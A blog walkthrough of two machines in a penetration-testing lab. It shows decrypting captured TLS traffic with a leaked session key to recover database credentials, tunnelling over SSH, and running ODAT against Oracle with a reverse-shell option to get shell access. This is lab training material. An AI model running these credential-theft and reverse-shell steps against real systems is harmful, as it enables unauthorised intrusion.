Test Lab V8: JavaDev and DB

May 4, 2016 by Warlock

In this part of the article, we are going to solve JavaDev and DB system.

As can be seen in the above diagram, DB system is mentioned in the network, but JavaDev is not there. JavaDev is not a separate system the token for this system is hidden in some other files which can be found in a specific system.

Attacking the JavaDev: As we remember, we found a debug folder from SSH system that folder contains a log file and pcap file captured by Wireshark.

We opened the debug.txt file, and we found it is a HTTPS encrypted traffic.

On the same text file, we scroll down, and we found Client Nonce and Master Secret key

After Googling about both keys, we found that SSL traffic can be decrypted by using Wireshark.

Before that we saved the both key in separate text file key.txt like this format:

CLIENT_RANDOM 56448610b995cc0f8100560fcf0cf8be7330b2d2f31d86a4259e1ec102f76c50 7cda1b7081ae8a7fae76ca71fbc704ec24796ce5c1f53a15f16325b33946544fd0b1dabde4db187504a74c1138d163bf

Open wireshark then go to File > Preferences

Then select SSL from the protocol section.

Browse for the text file where we have saved our client and nonce key and press OK.

Now load that pcap file in the wireshark.

Now go to Analyze > Decode As

Select SSL from the list.

Now click on Client Hello string and Analyze > Follow SSL Stream.

And we found the token for the JavaDev and also credential for Database:




Attacking the DB: Before attacking this system, we need two things in our system — Oracle support in Metasploit: https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux( install 11.1 version only)

ODAT(Oracle Database Attack Toolkit): https://github.com/quentinhardy/odat

Once we configure both tools in the system, we need to create an SSH tunnel to connect to DB, notice in the network diagram that there is an SSH icon, and it is in a different network. Command usage: ssh -nNT -i <daviskey> -f -L 9000: davis@

Now for connecting to the Database, we have the instance, username, and password which we found from the JavaDev. Type in the following command:

sqlplus ‘TESTER1/Token_Java_dev_hydrogen1@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=’

Now we will use the ODAT tool. Type in : ./odat.py dbmsscheduler -s -p 9000 -d XE -U TESTER1 -P Token_Java_dev_hydrogen1 –reverse-shell 443

After running the command, it drop the shell access and then simply find the token by using find -name “*token*” and the output will be /u01/app/oracle/product/11.2.0/xe/token.txt

Reference: https://www.trustwave.com/Resources/SpiderLabs-Blog/How-To-Decrypt-Ruby-SSL-Communications-with-Wireshark/

Posted: May 4, 2016
View Profile

Warlock works as a Information Security Professional. He has quite a few global certifications to his name such as CEH, CHFI, OSCP and ISO 27001 Lead Implementer. He has experience in penetration testing, social engineering, password cracking and malware obfuscation. He is also involved with various organizations to help them in strengthening the security of their applications and infrastructure.